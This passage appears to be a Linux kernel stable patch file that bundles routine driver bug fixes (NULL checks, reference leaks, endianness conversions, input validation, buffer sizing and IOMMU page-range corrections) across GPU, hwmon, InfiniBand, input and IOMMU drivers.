+index 919e6cc049828..3c0aa8b5e1ae3 100644
+--- a/drivers/gpu/drm/panfrost/panfrost_drv.c
++++ b/drivers/gpu/drm/panfrost/panfrost_drv.c
+@@ -704,3 +704,4 @@ module_platform_driver(panfrost_driver);
+ MODULE_AUTHOR("Panfrost Project Developers");
+ MODULE_DESCRIPTION("Panfrost DRM Driver");
+ MODULE_LICENSE("GPL v2");
++MODULE_SOFTDEP("pre: governor_simpleondemand");
+diff --git a/drivers/gpu/drm/qxl/qxl_display.c b/drivers/gpu/drm/qxl/qxl_display.c
+index f91a86225d5e7..462a4d2ac0b95 100644
+--- a/drivers/gpu/drm/qxl/qxl_display.c
++++ b/drivers/gpu/drm/qxl/qxl_display.c
+@@ -236,6 +236,9 @@ static int qxl_add_mode(struct drm_connector *connector,
+ 		return 0;
+ 
+ 	mode = drm_cvt_mode(dev, width, height, 60, false, false, false);
++	if (!mode)
++		return 0;
++
+ 	if (preferred)
+ 		mode->type |= DRM_MODE_TYPE_PREFERRED;
+ 	mode->hdisplay = width;
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+index a72642bb9cc60..80b8c83342840 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+@@ -1923,7 +1923,7 @@ static void vop2_setup_layer_mixer(struct vop2_video_port *vp)
+ 		port_sel |= FIELD_PREP(RK3568_OVL_PORT_SET__PORT2_MUX,
+ 			(vp2->nlayers + vp1->nlayers + vp0->nlayers - 1));
+ 	else
+-		port_sel |= FIELD_PREP(RK3568_OVL_PORT_SET__PORT1_MUX, 8);
++		port_sel |= FIELD_PREP(RK3568_OVL_PORT_SET__PORT2_MUX, 8);
+ 
+ 	layer_sel = vop2_readl(vop2, RK3568_OVL_LAYER_SEL);
+ 
+diff --git a/drivers/hwmon/adt7475.c b/drivers/hwmon/adt7475.c
+index 6a6ebcc896b1d..3ac6744276750 100644
+--- a/drivers/hwmon/adt7475.c
++++ b/drivers/hwmon/adt7475.c
+@@ -1863,7 +1863,7 @@ static void adt7475_read_pwm(struct i2c_client *client, int index)
+ 		data->pwm[CONTROL][index] &= ~0xE0;
+ 		data->pwm[CONTROL][index] |= (7 << 5);
+ 
+-		i2c_smbus_write_byte_data(client, PWM_CONFIG_REG(index),
++		i2c_smbus_write_byte_data(client, PWM_REG(index),
+ 					  data->pwm[INPUT][index]);
+ 
+ 		i2c_smbus_write_byte_data(client, PWM_CONFIG_REG(index),
+diff --git a/drivers/hwmon/max6697.c b/drivers/hwmon/max6697.c
+index 2895cea541934..266baae94e3ee 100644
+--- a/drivers/hwmon/max6697.c
++++ b/drivers/hwmon/max6697.c
+@@ -312,6 +312,7 @@ static ssize_t temp_store(struct device *dev,
+ 		return ret;
+ 
+ 	mutex_lock(&data->update_lock);
++	temp = clamp_val(temp, -1000000, 1000000);	/* prevent underflow */
+ 	temp = DIV_ROUND_CLOSEST(temp, 1000) + data->temp_offset;
+ 	temp = clamp_val(temp, 0, data->type == max6581 ? 255 : 127);
+ 	data->temp[nr][index] = temp;
+@@ -429,14 +430,14 @@ static SENSOR_DEVICE_ATTR_RO(temp6_max_alarm, alarm, 20);
+ static SENSOR_DEVICE_ATTR_RO(temp7_max_alarm, alarm, 21);
+ static SENSOR_DEVICE_ATTR_RO(temp8_max_alarm, alarm, 23);
+ 
+-static SENSOR_DEVICE_ATTR_RO(temp1_crit_alarm, alarm, 14);
++static SENSOR_DEVICE_ATTR_RO(temp1_crit_alarm, alarm, 15);
+ static SENSOR_DEVICE_ATTR_RO(temp2_crit_alarm, alarm, 8);
+ static SENSOR_DEVICE_ATTR_RO(temp3_crit_alarm, alarm, 9);
+ static SENSOR_DEVICE_ATTR_RO(temp4_crit_alarm, alarm, 10);
+ static SENSOR_DEVICE_ATTR_RO(temp5_crit_alarm, alarm, 11);
+ static SENSOR_DEVICE_ATTR_RO(temp6_crit_alarm, alarm, 12);
+ static SENSOR_DEVICE_ATTR_RO(temp7_crit_alarm, alarm, 13);
+-static SENSOR_DEVICE_ATTR_RO(temp8_crit_alarm, alarm, 15);
++static SENSOR_DEVICE_ATTR_RO(temp8_crit_alarm, alarm, 14);
+ 
+ static SENSOR_DEVICE_ATTR_RO(temp2_fault, alarm, 1);
+ static SENSOR_DEVICE_ATTR_RO(temp3_fault, alarm, 2);
+diff --git a/drivers/hwtracing/coresight/coresight-platform.c b/drivers/hwtracing/coresight/coresight-platform.c
+index 4758997141046..3f82ae07a18e5 100644
+--- a/drivers/hwtracing/coresight/coresight-platform.c
++++ b/drivers/hwtracing/coresight/coresight-platform.c
+@@ -323,8 +323,10 @@ static int of_get_coresight_platform_data(struct device *dev,
+ 			continue;
+ 
+ 		ret = of_coresight_parse_endpoint(dev, ep, pdata);
+-		if (ret)
++		if (ret) {
++			of_node_put(ep);
+ 			return ret;
++		}
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/iio/frequency/adrf6780.c b/drivers/iio/frequency/adrf6780.c
+index b4defb82f37e3..3f46032c92752 100644
+--- a/drivers/iio/frequency/adrf6780.c
++++ b/drivers/iio/frequency/adrf6780.c
+@@ -9,7 +9,6 @@
+ #include <linux/bits.h>
+ #include <linux/clk.h>
+ #include <linux/clkdev.h>
+-#include <linux/clk-provider.h>
+ #include <linux/delay.h>
+ #include <linux/device.h>
+ #include <linux/iio/iio.h>
+diff --git a/drivers/infiniband/core/cache.c b/drivers/infiniband/core/cache.c
+index 4084d05a45102..c319664ca74b3 100644
+--- a/drivers/infiniband/core/cache.c
++++ b/drivers/infiniband/core/cache.c
+@@ -794,7 +794,6 @@ static struct ib_gid_table *alloc_gid_table(int sz)
+ static void release_gid_table(struct ib_device *device,
+ 			      struct ib_gid_table *table)
+ {
+-	bool leak = false;
+ 	int i;
+ 
+ 	if (!table)
+@@ -803,15 +802,12 @@ static void release_gid_table(struct ib_device *device,
+ 	for (i = 0; i < table->sz; i++) {
+ 		if (is_gid_entry_free(table->data_vec[i]))
+ 			continue;
+-		if (kref_read(&table->data_vec[i]->kref) > 1) {
+-			dev_err(&device->dev,
+-				"GID entry ref leak for index %d ref=%u\n", i,
+-				kref_read(&table->data_vec[i]->kref));
+-			leak = true;
+-		}
++
++		WARN_ONCE(true,
++			  "GID entry ref leak for dev %s index %d ref=%u\n",
++			  dev_name(&device->dev), i,
++			  kref_read(&table->data_vec[i]->kref));
+ 	}
+-	if (leak)
+-		return;
+ 
+ 	mutex_destroy(&table->lock);
+ 	kfree(table->data_vec);
+diff --git a/drivers/infiniband/core/device.c b/drivers/infiniband/core/device.c
+index 453188db39d83..291ded20934c8 100644
+--- a/drivers/infiniband/core/device.c
++++ b/drivers/infiniband/core/device.c
+@@ -2146,6 +2146,9 @@ int ib_device_set_netdev(struct ib_device *ib_dev, struct net_device *ndev,
+ 	unsigned long flags;
+ 	int ret;
+ 
++	if (!rdma_is_port_valid(ib_dev, port))
++		return -EINVAL;
++
+ 	/*
+ 	 * Drivers wish to call this before ib_register_driver, so we have to
+ 	 * setup the port data early.
+@@ -2154,9 +2157,6 @@ int ib_device_set_netdev(struct ib_device *ib_dev, struct net_device *ndev,
+ 	if (ret)
+ 		return ret;
+ 
+-	if (!rdma_is_port_valid(ib_dev, port))
+-		return -EINVAL;
+-
+ 	pdata = &ib_dev->port_data[port];
+ 	spin_lock_irqsave(&pdata->netdev_lock, flags);
+ 	old_ndev = rcu_dereference_protected(
+diff --git a/drivers/infiniband/core/iwcm.c b/drivers/infiniband/core/iwcm.c
+index 2b47073c61a65..2d09d1be38f19 100644
+--- a/drivers/infiniband/core/iwcm.c
++++ b/drivers/infiniband/core/iwcm.c
+@@ -369,8 +369,10 @@ EXPORT_SYMBOL(iw_cm_disconnect);
+  *
+  * Clean up all resources associated with the connection and release
+  * the initial reference taken by iw_create_cm_id.
++ *
++ * Returns true if and only if the last cm_id_priv reference has been dropped.
+  */
+-static void destroy_cm_id(struct iw_cm_id *cm_id)
++static bool destroy_cm_id(struct iw_cm_id *cm_id)
+ {
+ 	struct iwcm_id_private *cm_id_priv;
+ 	struct ib_qp *qp;
+@@ -440,7 +442,7 @@ static void destroy_cm_id(struct iw_cm_id *cm_id)
+ 		iwpm_remove_mapping(&cm_id->local_addr, RDMA_NL_IWCM);
+ 	}
+ 
+-	(void)iwcm_deref_id(cm_id_priv);
++	return iwcm_deref_id(cm_id_priv);
+ }
+ 
+ /*
+@@ -451,7 +453,8 @@ static void destroy_cm_id(struct iw_cm_id *cm_id)
+  */
+ void iw_destroy_cm_id(struct iw_cm_id *cm_id)
+ {
+-	destroy_cm_id(cm_id);
++	if (!destroy_cm_id(cm_id))
++		flush_workqueue(iwcm_wq);
+ }
+ EXPORT_SYMBOL(iw_destroy_cm_id);
+ 
+@@ -1035,7 +1038,7 @@ static void cm_work_handler(struct work_struct *_work)
+ 		if (!test_bit(IWCM_F_DROP_EVENTS, &cm_id_priv->flags)) {
+ 			ret = process_event(cm_id_priv, &levent);
+ 			if (ret)
+-				destroy_cm_id(&cm_id_priv->id);
++				WARN_ON_ONCE(destroy_cm_id(&cm_id_priv->id));
+ 		} else
+ 			pr_debug("dropping event %d\n", levent.event);
+ 		if (iwcm_deref_id(cm_id_priv))
+diff --git a/drivers/infiniband/hw/bnxt_re/ib_verbs.c b/drivers/infiniband/hw/bnxt_re/ib_verbs.c
+index 6ed0568747eaa..4c34cb1cb7866 100644
+--- a/drivers/infiniband/hw/bnxt_re/ib_verbs.c
++++ b/drivers/infiniband/hw/bnxt_re/ib_verbs.c
+@@ -2359,7 +2359,7 @@ static int bnxt_re_build_send_wqe(struct bnxt_re_qp *qp,
+ 		break;
+ 	case IB_WR_SEND_WITH_IMM:
+ 		wqe->type = BNXT_QPLIB_SWQE_TYPE_SEND_WITH_IMM;
+-		wqe->send.imm_data = wr->ex.imm_data;
++		wqe->send.imm_data = be32_to_cpu(wr->ex.imm_data);
+ 		break;
+ 	case IB_WR_SEND_WITH_INV:
+ 		wqe->type = BNXT_QPLIB_SWQE_TYPE_SEND_WITH_INV;
+@@ -2389,7 +2389,7 @@ static int bnxt_re_build_rdma_wqe(const struct ib_send_wr *wr,
+ 		break;
+ 	case IB_WR_RDMA_WRITE_WITH_IMM:
+ 		wqe->type = BNXT_QPLIB_SWQE_TYPE_RDMA_WRITE_WITH_IMM;
+-		wqe->rdma.imm_data = wr->ex.imm_data;
++		wqe->rdma.imm_data = be32_to_cpu(wr->ex.imm_data);
+ 		break;
+ 	case IB_WR_RDMA_READ:
+ 		wqe->type = BNXT_QPLIB_SWQE_TYPE_RDMA_READ;
+@@ -3340,7 +3340,7 @@ static void bnxt_re_process_res_shadow_qp_wc(struct bnxt_re_qp *gsi_sqp,
+ 	wc->byte_len = orig_cqe->length;
+ 	wc->qp = &gsi_qp->ib_qp;
+ 
+-	wc->ex.imm_data = orig_cqe->immdata;
++	wc->ex.imm_data = cpu_to_be32(le32_to_cpu(orig_cqe->immdata));
+ 	wc->src_qp = orig_cqe->src_qp;
+ 	memcpy(wc->smac, orig_cqe->smac, ETH_ALEN);
+ 	if (bnxt_re_is_vlan_pkt(orig_cqe, &vlan_id, &sl)) {
+@@ -3476,7 +3476,7 @@ int bnxt_re_poll_cq(struct ib_cq *ib_cq, int num_entries, struct ib_wc *wc)
+ 				 (unsigned long)(cqe->qp_handle),
+ 				 struct bnxt_re_qp, qplib_qp);
+ 			wc->qp = &qp->ib_qp;
+-			wc->ex.imm_data = cqe->immdata;
++			wc->ex.imm_data = cpu_to_be32(le32_to_cpu(cqe->immdata));
+ 			wc->src_qp = cqe->src_qp;
+ 			memcpy(wc->smac, cqe->smac, ETH_ALEN);
+ 			wc->port_num = 1;
+diff --git a/drivers/infiniband/hw/bnxt_re/qplib_fp.h b/drivers/infiniband/hw/bnxt_re/qplib_fp.h
+index 49d89c0808275..4f1a845f9be6c 100644
+--- a/drivers/infiniband/hw/bnxt_re/qplib_fp.h
++++ b/drivers/infiniband/hw/bnxt_re/qplib_fp.h
+@@ -164,7 +164,7 @@ struct bnxt_qplib_swqe {
+ 		/* Send, with imm, inval key */
+ 		struct {
+ 			union {
+-				__be32	imm_data;
++				u32	imm_data;
+ 				u32	inv_key;
+ 			};
+ 			u32		q_key;
+@@ -182,7 +182,7 @@ struct bnxt_qplib_swqe {
+ 		/* RDMA write, with imm, read */
+ 		struct {
+ 			union {
+-				__be32	imm_data;
++				u32	imm_data;
+ 				u32	inv_key;
+ 			};
+ 			u64		remote_va;
+@@ -374,7 +374,7 @@ struct bnxt_qplib_cqe {
+ 	u16				cfa_meta;
+ 	u64				wr_id;
+ 	union {
+-		__be32			immdata;
++		__le32			immdata;
+ 		u32			invrkey;
+ 	};
+ 	u64				qp_handle;
+diff --git a/drivers/infiniband/hw/hns/hns_roce_device.h b/drivers/infiniband/hw/hns/hns_roce_device.h
+index 8748b65c87ea7..a2bdfa026c560 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_device.h
++++ b/drivers/infiniband/hw/hns/hns_roce_device.h
+@@ -82,6 +82,7 @@
+ #define MR_TYPE_DMA				0x03
+ 
+ #define HNS_ROCE_FRMR_MAX_PA			512
++#define HNS_ROCE_FRMR_ALIGN_SIZE		128
+ 
+ #define PKEY_ID					0xffff
+ #define NODE_DESC_SIZE				64
+@@ -90,6 +91,8 @@
+ /* Configure to HW for PAGE_SIZE larger than 4KB */
+ #define PG_SHIFT_OFFSET				(PAGE_SHIFT - 12)
+ 
++#define ATOMIC_WR_LEN				8
++
+ #define HNS_ROCE_IDX_QUE_ENTRY_SZ		4
+ #define SRQ_DB_REG				0x230
+ 
+@@ -180,6 +183,9 @@ enum {
+ #define HNS_HW_PAGE_SHIFT			12
+ #define HNS_HW_PAGE_SIZE			(1 << HNS_HW_PAGE_SHIFT)
+ 
++#define HNS_HW_MAX_PAGE_SHIFT			27
++#define HNS_HW_MAX_PAGE_SIZE			(1 << HNS_HW_MAX_PAGE_SHIFT)
++
+ struct hns_roce_uar {
+ 	u64		pfn;
+ 	unsigned long	index;
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+index c931cce50d50d..c4521ab66ee45 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
++++ b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+@@ -602,11 +602,16 @@ static inline int set_rc_wqe(struct hns_roce_qp *qp,
+ 		     (wr->send_flags & IB_SEND_SIGNALED) ? 1 : 0);
+ 
+ 	if (wr->opcode == IB_WR_ATOMIC_CMP_AND_SWP ||
+-	    wr->opcode == IB_WR_ATOMIC_FETCH_AND_ADD)
++	    wr->opcode == IB_WR_ATOMIC_FETCH_AND_ADD) {
++		if (msg_len != ATOMIC_WR_LEN)
++			return -EINVAL;
+ 		set_atomic_seg(wr, rc_sq_wqe, valid_num_sge);
+-	else if (wr->opcode != IB_WR_REG_MR)
++	} else if (wr->opcode != IB_WR_REG_MR) {
+ 		ret = set_rwqe_data_seg(&qp->ibqp, wr, rc_sq_wqe,
+ 					&curr_idx, valid_num_sge);
++		if (ret)
++			return ret;
++	}
+ 
+ 	/*
+ 	 * The pipeline can sequentially post all valid WQEs into WQ buffer,
+@@ -2569,14 +2574,16 @@ static int set_llm_cfg_to_hw(struct hns_roce_dev *hr_dev,
+ static struct hns_roce_link_table *
+ alloc_link_table_buf(struct hns_roce_dev *hr_dev)
+ {
++	u16 total_sl = hr_dev->caps.sl_num * hr_dev->func_num;
+ 	struct hns_roce_v2_priv *priv = hr_dev->priv;
+ 	struct hns_roce_link_table *link_tbl;
+ 	u32 pg_shift, size, min_size;
+ 
+ 	link_tbl = &priv->ext_llm;
+ 	pg_shift = hr_dev->caps.llm_buf_pg_sz + PAGE_SHIFT;
+-	size = hr_dev->caps.num_qps * HNS_ROCE_V2_EXT_LLM_ENTRY_SZ;
+-	min_size = HNS_ROCE_EXT_LLM_MIN_PAGES(hr_dev->caps.sl_num) << pg_shift;
++	size = hr_dev->caps.num_qps * hr_dev->func_num *
++	       HNS_ROCE_V2_EXT_LLM_ENTRY_SZ;
++	min_size = HNS_ROCE_EXT_LLM_MIN_PAGES(total_sl) << pg_shift;
+ 
+ 	/* Alloc data table */
+ 	size = max(size, min_size);
+@@ -6413,9 +6420,16 @@ static void hns_roce_v2_int_mask_enable(struct hns_roce_dev *hr_dev,
+ 	roce_write(hr_dev, ROCEE_VF_ABN_INT_CFG_REG, enable_flag);
+ }
+ 
+-static void hns_roce_v2_destroy_eqc(struct hns_roce_dev *hr_dev, u32 eqn)
++static void free_eq_buf(struct hns_roce_dev *hr_dev, struct hns_roce_eq *eq)
++{
++	hns_roce_mtr_destroy(hr_dev, &eq->mtr);
++}
++
++static void hns_roce_v2_destroy_eqc(struct hns_roce_dev *hr_dev,
++				    struct hns_roce_eq *eq)
+ {
+ 	struct device *dev = hr_dev->dev;
++	int eqn = eq->eqn;
+ 	int ret;
+ 	u8 cmd;
+ 
+@@ -6426,12 +6440,9 @@ static void hns_roce_v2_destroy_eqc(struct hns_roce_dev *hr_dev, u32 eqn)
+ 
+ 	ret = hns_roce_destroy_hw_ctx(hr_dev, cmd, eqn & HNS_ROCE_V2_EQN_M);
+ 	if (ret)
+-		dev_err(dev, "[mailbox cmd] destroy eqc(%u) failed.\n", eqn);
+-}
++		dev_err(dev, "[mailbox cmd] destroy eqc(%d) failed.\n", eqn);
+ 
+-static void free_eq_buf(struct hns_roce_dev *hr_dev, struct hns_roce_eq *eq)
+-{
+-	hns_roce_mtr_destroy(hr_dev, &eq->mtr);
++	free_eq_buf(hr_dev, eq);
+ }
+ 
+ static void init_eq_config(struct hns_roce_dev *hr_dev, struct hns_roce_eq *eq)
+@@ -6737,7 +6748,7 @@ static int hns_roce_v2_init_eq_table(struct hns_roce_dev *hr_dev)
+ 
+ err_create_eq_fail:
+ 	for (i -= 1; i >= 0; i--)
+-		free_eq_buf(hr_dev, &eq_table->eq[i]);
++		hns_roce_v2_destroy_eqc(hr_dev, &eq_table->eq[i]);
+ 	kfree(eq_table->eq);
+ 
+ 	return ret;
+@@ -6757,11 +6768,8 @@ static void hns_roce_v2_cleanup_eq_table(struct hns_roce_dev *hr_dev)
+ 	__hns_roce_free_irq(hr_dev);
+ 	destroy_workqueue(hr_dev->irq_workq);
+ 
+-	for (i = 0; i < eq_num; i++) {
+-		hns_roce_v2_destroy_eqc(hr_dev, i);
+-
+-		free_eq_buf(hr_dev, &eq_table->eq[i]);
+-	}
++	for (i = 0; i < eq_num; i++)
++		hns_roce_v2_destroy_eqc(hr_dev, &eq_table->eq[i]);
+ 
+ 	kfree(eq_table->eq);
+ }
+diff --git a/drivers/infiniband/hw/hns/hns_roce_mr.c b/drivers/infiniband/hw/hns/hns_roce_mr.c
+index 190e62da98e4b..980261969b0c0 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_mr.c
++++ b/drivers/infiniband/hw/hns/hns_roce_mr.c
+@@ -423,6 +423,11 @@ int hns_roce_map_mr_sg(struct ib_mr *ibmr, struct scatterlist *sg, int sg_nents,
+ 	struct hns_roce_mtr *mtr = &mr->pbl_mtr;
+ 	int ret, sg_num = 0;
+ 
++	if (!IS_ALIGNED(*sg_offset, HNS_ROCE_FRMR_ALIGN_SIZE) ||
++	    ibmr->page_size < HNS_HW_PAGE_SIZE ||
++	    ibmr->page_size > HNS_HW_MAX_PAGE_SIZE)
++		return sg_num;
++
+ 	mr->npages = 0;
+ 	mr->page_list = kvcalloc(mr->pbl_mtr.hem_cfg.buf_pg_count,
+ 				 sizeof(dma_addr_t), GFP_KERNEL);
+diff --git a/drivers/infiniband/hw/hns/hns_roce_qp.c b/drivers/infiniband/hw/hns/hns_roce_qp.c
+index 7b79e6b3f3baa..c97b5dba17728 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_qp.c
++++ b/drivers/infiniband/hw/hns/hns_roce_qp.c
+@@ -538,13 +538,15 @@ static unsigned int get_sge_num_from_max_inl_data(bool is_ud_or_gsi,
+ {
+ 	unsigned int inline_sge;
+ 
+-	inline_sge = roundup_pow_of_two(max_inline_data) / HNS_ROCE_SGE_SIZE;
++	if (!max_inline_data)
++		return 0;
+ 
+ 	/*
+ 	 * if max_inline_data less than
+ 	 * HNS_ROCE_SGE_IN_WQE * HNS_ROCE_SGE_SIZE,
+ 	 * In addition to ud's mode, no need to extend sge.
+ 	 */
++	inline_sge = roundup_pow_of_two(max_inline_data) / HNS_ROCE_SGE_SIZE;
+ 	if (!is_ud_or_gsi && inline_sge <= HNS_ROCE_SGE_IN_WQE)
+ 		inline_sge = 0;
+ 
+diff --git a/drivers/infiniband/hw/hns/hns_roce_srq.c b/drivers/infiniband/hw/hns/hns_roce_srq.c
+index 6a4923c21cbc6..727f926500712 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_srq.c
++++ b/drivers/infiniband/hw/hns/hns_roce_srq.c
+@@ -296,7 +296,7 @@ static int set_srq_basic_param(struct hns_roce_srq *srq,
+ 
+ 	max_sge = proc_srq_sge(hr_dev, srq, !!udata);
+ 	if (attr->max_wr > hr_dev->caps.max_srq_wrs ||
+-	    attr->max_sge > max_sge) {
++	    attr->max_sge > max_sge || !attr->max_sge) {
+ 		ibdev_err(&hr_dev->ib_dev,
+ 			  "invalid SRQ attr, depth = %u, sge = %u.\n",
+ 			  attr->max_wr, attr->max_sge);
+diff --git a/drivers/infiniband/hw/mlx4/alias_GUID.c b/drivers/infiniband/hw/mlx4/alias_GUID.c
+index 111fa88a3be44..9a439569ffcf3 100644
+--- a/drivers/infiniband/hw/mlx4/alias_GUID.c
++++ b/drivers/infiniband/hw/mlx4/alias_GUID.c
+@@ -829,7 +829,7 @@ void mlx4_ib_destroy_alias_guid_service(struct mlx4_ib_dev *dev)
+ 
+ int mlx4_ib_init_alias_guid_service(struct mlx4_ib_dev *dev)
+ {
+-	char alias_wq_name[15];
++	char alias_wq_name[22];
+ 	int ret = 0;
+ 	int i, j;
+ 	union ib_gid gid;
+diff --git a/drivers/infiniband/hw/mlx4/mad.c b/drivers/infiniband/hw/mlx4/mad.c
+index a37cfac5e23f9..dc9cf45d2d320 100644
+--- a/drivers/infiniband/hw/mlx4/mad.c
++++ b/drivers/infiniband/hw/mlx4/mad.c
+@@ -2158,7 +2158,7 @@ static int mlx4_ib_alloc_demux_ctx(struct mlx4_ib_dev *dev,
+ 				       struct mlx4_ib_demux_ctx *ctx,
+ 				       int port)
+ {
+-	char name[12];
++	char name[21];
+ 	int ret = 0;
+ 	int i;
+ 
+diff --git a/drivers/infiniband/hw/mlx5/mlx5_ib.h b/drivers/infiniband/hw/mlx5/mlx5_ib.h
+index 8d94e6834e01b..0ef347e91ffeb 100644
+--- a/drivers/infiniband/hw/mlx5/mlx5_ib.h
++++ b/drivers/infiniband/hw/mlx5/mlx5_ib.h
+@@ -109,6 +109,19 @@ unsigned long __mlx5_umem_find_best_quantized_pgoff(
+ 		__mlx5_bit_sz(typ, page_offset_fld), 0, scale,                 \
+ 		page_offset_quantized)
+ 
++static inline unsigned long
++mlx5_umem_dmabuf_find_best_pgsz(struct ib_umem_dmabuf *umem_dmabuf)
++{
++	/*
++	 * mkeys used for dmabuf are fixed at PAGE_SIZE because we must be able
++	 * to hold any sgl after a move operation. Ideally the mkc page size
++	 * could be changed at runtime to be optimal, but right now the driver
++	 * cannot do that.
++	 */
++	return ib_umem_find_best_pgsz(&umem_dmabuf->umem, PAGE_SIZE,
++				      umem_dmabuf->umem.iova);
++}
++
+ enum {
+ 	MLX5_IB_MMAP_OFFSET_START = 9,
+ 	MLX5_IB_MMAP_OFFSET_END = 255,
+diff --git a/drivers/infiniband/hw/mlx5/odp.c b/drivers/infiniband/hw/mlx5/odp.c
+index bc97958818bb5..af73c5ebe6ac5 100644
+--- a/drivers/infiniband/hw/mlx5/odp.c
++++ b/drivers/infiniband/hw/mlx5/odp.c
+@@ -706,10 +706,8 @@ static int pagefault_dmabuf_mr(struct mlx5_ib_mr *mr, size_t bcnt,
+ 		return err;
+ 	}
+ 
+-	page_size = mlx5_umem_find_best_pgsz(&umem_dmabuf->umem, mkc,
+-					     log_page_size, 0,
+-					     umem_dmabuf->umem.iova);
+-	if (unlikely(page_size < PAGE_SIZE)) {
++	page_size = mlx5_umem_dmabuf_find_best_pgsz(umem_dmabuf);
++	if (!page_size) {
+ 		ib_umem_dmabuf_unmap_pages(umem_dmabuf);
+ 		err = -EINVAL;
+ 	} else {
+diff --git a/drivers/infiniband/sw/rxe/rxe_req.c b/drivers/infiniband/sw/rxe/rxe_req.c
+index 2ace1007a4195..35768fdbd5b74 100644
+--- a/drivers/infiniband/sw/rxe/rxe_req.c
++++ b/drivers/infiniband/sw/rxe/rxe_req.c
+@@ -390,7 +390,7 @@ static struct sk_buff *init_req_packet(struct rxe_qp *qp,
+ 	int			paylen;
+ 	int			solicited;
+ 	u32			qp_num;
+-	int			ack_req;
++	int			ack_req = 0;
+ 
+ 	/* length from start of bth to end of icrc */
+ 	paylen = rxe_opcode[opcode].length + payload + pad + RXE_ICRC_SIZE;
+@@ -411,8 +411,9 @@ static struct sk_buff *init_req_packet(struct rxe_qp *qp,
+ 	qp_num = (pkt->mask & RXE_DETH_MASK) ? ibwr->wr.ud.remote_qpn :
+ 					 qp->attr.dest_qp_num;
+ 
+-	ack_req = ((pkt->mask & RXE_END_MASK) ||
+-		(qp->req.noack_pkts++ > RXE_MAX_PKT_PER_ACK));
++	if (qp_type(qp) != IB_QPT_UD && qp_type(qp) != IB_QPT_UC)
++		ack_req = ((pkt->mask & RXE_END_MASK) ||
++			   (qp->req.noack_pkts++ > RXE_MAX_PKT_PER_ACK));
+ 	if (ack_req)
+ 		qp->req.noack_pkts = 0;
+ 
+diff --git a/drivers/input/keyboard/qt1050.c b/drivers/input/keyboard/qt1050.c
+index 403060d05c3b3..7193a4198e214 100644
+--- a/drivers/input/keyboard/qt1050.c
++++ b/drivers/input/keyboard/qt1050.c
+@@ -226,7 +226,12 @@ static bool qt1050_identify(struct qt1050_priv *ts)
+ 	int err;
+ 
+ 	/* Read Chip ID */
+-	regmap_read(ts->regmap, QT1050_CHIP_ID, &val);
++	err = regmap_read(ts->regmap, QT1050_CHIP_ID, &val);
++	if (err) {
++		dev_err(&ts->client->dev, "Failed to read chip ID: %d\n", err);
++		return false;
++	}
++
+ 	if (val != QT1050_CHIP_ID_VER) {
+ 		dev_err(&ts->client->dev, "ID %d not supported\n", val);
+ 		return false;
+diff --git a/drivers/input/mouse/elan_i2c_core.c b/drivers/input/mouse/elan_i2c_core.c
+index d4eb59b55bf1f..5fa0d6ef627bc 100644
+--- a/drivers/input/mouse/elan_i2c_core.c
++++ b/drivers/input/mouse/elan_i2c_core.c
+@@ -1372,6 +1372,8 @@ static int __maybe_unused elan_suspend(struct device *dev)
+ 	}
+ 
+ err:
++	if (ret)
++		enable_irq(client->irq);
+ 	mutex_unlock(&data->sysfs_mutex);
+ 	return ret;
+ }
+diff --git a/drivers/interconnect/qcom/qcm2290.c b/drivers/interconnect/qcom/qcm2290.c
+index ca7ad37ea6777..d75bb918e1bb7 100644
+--- a/drivers/interconnect/qcom/qcm2290.c
++++ b/drivers/interconnect/qcom/qcm2290.c
+@@ -166,7 +166,7 @@ static struct qcom_icc_node mas_snoc_bimc = {
+ 	.qos.ap_owned = true,
+ 	.qos.qos_port = 6,
+ 	.qos.qos_mode = NOC_QOS_MODE_BYPASS,
+-	.mas_rpm_id = 164,
++	.mas_rpm_id = 3,
+ 	.slv_rpm_id = -1,
+ 	.num_links = ARRAY_SIZE(mas_snoc_bimc_links),
+ 	.links = mas_snoc_bimc_links,
+diff --git a/drivers/iommu/intel/iommu.c b/drivers/iommu/intel/iommu.c
+index e111b35a7aff2..7b9502c30fe94 100644
+--- a/drivers/iommu/intel/iommu.c
++++ b/drivers/iommu/intel/iommu.c
+@@ -113,13 +113,17 @@ static inline unsigned long lvl_to_nr_pages(unsigned int lvl)
+ 
+ /* VT-d pages must always be _smaller_ than MM pages. Otherwise things
+    are never going to work. */
+-static inline unsigned long mm_to_dma_pfn(unsigned long mm_pfn)
++static inline unsigned long mm_to_dma_pfn_start(unsigned long mm_pfn)
+ {
+ 	return mm_pfn << (PAGE_SHIFT - VTD_PAGE_SHIFT);
+ }
++static inline unsigned long mm_to_dma_pfn_end(unsigned long mm_pfn)
++{
++	return ((mm_pfn + 1) << (PAGE_SHIFT - VTD_PAGE_SHIFT)) - 1;
++}
+ static inline unsigned long page_to_dma_pfn(struct page *pg)
+ {
+-	return mm_to_dma_pfn(page_to_pfn(pg));
++	return mm_to_dma_pfn_start(page_to_pfn(pg));
+ }
+ static inline unsigned long virt_to_dma_pfn(void *p)
+ {
+@@ -2439,8 +2443,8 @@ static int __init si_domain_init(int hw)
+ 
+ 		for_each_mem_pfn_range(i, nid, &start_pfn, &end_pfn, NULL) {
+ 			ret = iommu_domain_identity_map(si_domain,
+-					mm_to_dma_pfn(start_pfn),
+-					mm_to_dma_pfn(end_pfn));
++					mm_to_dma_pfn_start(start_pfn),
++					mm_to_dma_pfn_end(end_pfn-1));
+ 			if (ret)
+ 				return ret;
+ 		}
+@@ -2461,8 +2465,8 @@ static int __init si_domain_init(int hw)
+ 				continue;
+ 
+ 			ret = iommu_domain_identity_map(si_domain,
+-					mm_to_dma_pfn(start >> PAGE_SHIFT),
+-					mm_to_dma_pfn(end >> PAGE_SHIFT));
++					mm_to_dma_pfn_start(start >> PAGE_SHIFT),
++					mm_to_dma_pfn_end(end >> PAGE_SHIFT));
+ 			if (ret)
+ 				return ret;
+ 		}
